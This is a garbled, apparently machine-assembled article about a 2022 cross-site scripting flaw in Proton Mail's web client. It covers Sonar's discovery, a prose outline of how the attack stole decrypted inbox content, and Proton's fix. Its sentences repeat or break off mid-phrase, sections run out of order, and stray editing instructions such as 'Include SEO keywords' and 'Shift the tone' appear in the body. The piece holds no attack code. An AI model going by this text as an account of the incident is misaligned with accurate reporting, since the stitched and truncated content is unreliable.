Analysis of spam and virus filter logs showed no evidence of the exploit being used in the wild by malicious actors.
Add details about other recent fixes (like the patch). Include SEO keywords tailored for cybersecurity audiences. Proton Mail's responsible vulnerability disclosure policy
This incident serves as a reminder that no system is 100% secure, but active collaboration with the security community—often incentivized by Proton's Bug Bounty Program —is essential for maintaining privacy. To stay secure, users should: Proton Exploit
In most scenarios, the attack only worked if the victim viewed both emails and clicked a specific link in the second one.
The Sonar Research team identified the vulnerability during a routine audit of Proton's open-source repositories. The issue stemmed from how the web application handled user-controlled HTML. While senders need the ability to style messages, failing to properly sanitize certain tags can allow malicious tags to execute in a reader's browser. How the Exploit Worked Analysis of spam and virus filter logs showed
After researchers disclosed the bug in June 2022, Proton developed and deployed a fix by early July 2022.
Shift the tone (e.g., for developers or simpler for general users). The issue stemmed from how the web application
If successful, the script would run in the victim's session, allowing the attacker to "see" what the user sees—effectively stealing the decrypted content of their inbox. Proton's Response and Resolution